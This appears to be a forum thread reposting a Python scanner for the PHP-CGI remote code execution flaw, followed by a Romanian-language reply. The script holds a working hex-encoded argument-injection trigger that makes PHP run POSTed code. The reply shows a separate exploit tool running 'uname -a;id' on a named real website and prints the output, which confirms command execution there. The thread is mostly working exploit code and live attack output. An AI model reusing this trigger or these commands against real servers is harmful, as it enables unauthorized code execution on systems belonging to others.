PHP-CGI Remote Code Execution Scanner

[Fi8sVrs]

This small python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, includes "apache magica" and plesk paths, along with other misconfiguration.

#!/usr/bin/python2

# Written for /r/netsec

# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.

# infodox - insecurety.net - 2013

# Twitter: @Info_dox

# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku

# released under WTFPL

import requests

import sys

def scan(target):

paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']

for path in paths:

probe(target, path)

def probe(target, path):

print "[*] Testing Path: %s" %(path)

trigger = path + "/?"

trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"

trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"

trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"

trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"

trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"

trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"

trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"

trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"

trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"

trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"

trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"

trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"

trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"

url = target + trigger

php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""

try:

haxor = requests.post(url, php)

if "44e902a5aa760d79b76e070fa6725386" in haxor.text:

print "Exploitable!"

except Exception:

print "Err, Someshit broke"

def main(args):

if len(sys.argv) !=2:

print "Usage: %s <target>" %(sys.argv[0])

print "Eg: %s http://lol.com" %(sys.argv[0])

sys.exit(0)

target = sys.argv[1]

print "[*] Target is: %s" %(target)

scan(target)

if __name__ == "__main__":

main(sys.argv)

#_EOF infodox 2013

PHP-CGI Remote Code Execution Scanner ? Packet Storm

[Elohim]

Avem asa:

Test 1:

http://nullsecurity.net/tools/exploit/ap-unlock-v1337.py

python aphp.py -c "uname -a;id" -h koperbent.sk
--==[ ap-unlock-v1337.py by noptrix@nullsecurity.net ]==--
[+] s3nd1ng c0mm4ndz t0 h0st koperbent.sk
HTTP/1.1 200 OK
Date: Tue, 18 Feb 2014 11:26:37 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny16
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html

56
Linux server1.wibic.sk 2.6.26-2-686 #1 SMP Sun Mar 4 22:19:19 UTC 2012 i686 GNU/Linux

7e
uid=33(www-data) gid=33(www-data) groups=33(www-data),5003(ispapps),5004(ispconfig),5005(client0),5006(client2),5007(client1)

Si apoi cu cel postat de tine:

python checker.py http://koperbent.sk
[*] Target is: http://koperbent.sk
[*] Testing Path: /index.php
[*] Testing Path: /cgi-bin/php
[*] Testing Path: /cgi-bin/php5
[*] Testing Path: /cgi-bin/php-cgi
[*] Testing Path: /cgi-bin/php.cgi
[*] Testing Path: /cgi-bin/php4
[*] Testing Path: /phppath/php
[*] Testing Path: /phppath/php5
[*] Testing Path: /local-bin/php
[*] Testing Path: /local-bin/php5

In primul test se foloseste /cgi-bin/php , care este prezent si in al doilea test.

Am vrut sa modific cel postat de tine, in ceva multithreaded, si asa am dat peste problema.

Revin cu un update daca imi dau seama unde este problema.